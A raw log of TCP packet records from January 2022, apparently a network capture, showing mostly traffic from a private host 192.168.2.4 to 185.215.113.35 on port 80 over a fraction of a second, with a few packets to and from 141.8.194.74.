Jan 14, 2022 00:16:14.097248077 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:14.097275019 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:14.097275019 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.097301960 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:14.097327948 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:14.097459078 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.097548008 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.097654104 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.097743988 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.097830057 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.097949028 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.098038912 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.098133087 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.098226070 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.098310947 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.098402977 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.098490953 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.098586082 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.098709106 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.098968029 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.099183083 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.099298954 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.099406004 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.099508047 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.099611998 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.099854946 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.099961042 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.100063086 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.102404118 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:14.102436066 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:14.116930008 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:14.118544102 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.118643045 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.120724916 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:14.121767998 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.127166986 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:14.127907991 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:14.160990000 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:14.164235115 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:14.196520090 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.215763092 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.215893984 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.215986013 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.216105938 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.216248989 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.216411114 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.216418028 CET	49919	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.216528893 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.216624022 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.216721058 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.216818094 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.216907024 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.217000961 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.217093945 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.217185974 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.217281103 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.217372894 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.217464924 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.217557907 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.217662096 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.217758894 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.217859030 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.217950106 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.218043089 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.218135118 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.218229055 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.218326092 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.218416929 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.218509912 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.218605042 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.218705893 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.218800068 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.218894958 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.218992949 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.219089985 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.219182014 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.219275951 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.219368935 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.219461918 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.219554901 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.219647884 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.219746113 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.219839096 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.219932079 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.220022917 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.220124960 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.220221043 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.220312119 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.220407963 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.220499992 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.220594883 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.220755100 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.220895052 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.220956087 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.221034050 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.221129894 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.221210003 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.221292973 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.221369028 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.221455097 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.221544027 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.221626043 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.221730947 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.221817017 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.221908092 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.221986055 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.222070932 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.239314079 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.239542007 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.239651918 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.239778996 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.239875078 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.239970922 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.240062952 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.240154982 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.240247965 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.240344048 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.240437031 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.240540028 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.240636110 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.240729094 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.240824938 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.240956068 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.241050005 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.241152048 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.241216898 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.241311073 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.241403103 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.241492987 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.241588116 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.241682053 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.241775036 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.241882086 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.241974115 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.242065907 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.242160082 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.242252111 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.242345095 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.242436886 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.242552042 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.247782946 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.247915983 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.248047113 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.248151064 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.248243093 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.248337030 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.248433113 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.248527050 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.248621941 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.248713970 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.248814106 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.248903036 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.249003887 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.249092102 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.249175072 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.249357939 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.249376059 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.249448061 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.249548912 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.249635935 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.249733925 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.249845982 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.249933958 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.250030994 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.250122070 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.250216961 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.250308037 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.250402927 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.250494957 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.250592947 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.250689030 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.250785112 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.250893116 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.250997066 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.251104116 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.251199961 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.251292944 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.251389980 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.251478910 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.251571894 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.251666069 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.251763105 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.251853943 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.251950026 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.252039909 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.252136946 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.252229929 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.252325058 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.252418995 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.252532959 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.252625942 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.252722979 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.252816916 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.252912998 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.253002882 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.253099918 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.253191948 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.253288031 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.253379107 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.253477097 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.253570080 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.253667116 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.253758907 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.253859043 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.253968000 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.254067898 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.254167080 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.254268885 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.254369020 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.254468918 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.254565954 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.254664898 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.254781008 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.254883051 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.254980087 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.255093098 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.255179882 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.255276918 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.255369902 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.255466938 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.255561113 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.255656958 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.255753040 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.255846024 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.255940914 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.256037951 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.256125927 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.256225109 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.256378889 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.256531954 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.256629944 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.256721973 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.256812096 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.256895065 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.256980896 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.257086992 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.257175922 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.257266998 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.257358074 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.257450104 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.257539988 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.257688999 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.257781029 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.257874012 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.257952929 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.258038998 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.264673948 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.264928102 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.265053034 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.265141964 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.265223980 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.265314102 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.265394926 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.265479088 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.265563965 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.265647888 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.265760899 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.265849113 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.265928984 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.266012907 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.266098022 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.266269922 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.266364098 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.266453981 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.266545057 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.266637087 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.266733885 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.266827106 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.266921997 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.267004013 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.267091036 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.267174959 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.267256975 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.267343044 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.267425060 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.267513037 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.267592907 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.267687082 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.267767906 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.267853022 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.267940044 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.268018007 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.268105984 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.268188953 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.268268108 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.268354893 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.268439054 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.268523932 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.268608093 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.268707037 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.268793106 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.268872976 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.268960953 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.269042969 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.269124985 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.269210100 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.269294977 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.269377947 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.269464016 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.269546032 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.269634962 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.269722939 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.269809961 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.269908905 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.269999027 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.270090103 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.270178080 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.270268917 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.270359039 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.270452976 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.270540953 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.270622969 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.270718098 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.270802021 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.270888090 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.270973921 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.271058083 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.271142960 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.271224976 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.271312952 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.271397114 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.271476984 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.271564007 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.271646976 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.271738052 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.271823883 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.271910906 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.271994114 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.272077084 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.272161961 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.272252083 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.272345066 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.272427082 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.272515059 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.272599936 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.299707890 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.299850941 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.299964905 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.300055027 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.300158978 CET	49902	80	192.168.2.4	185.215.113.35
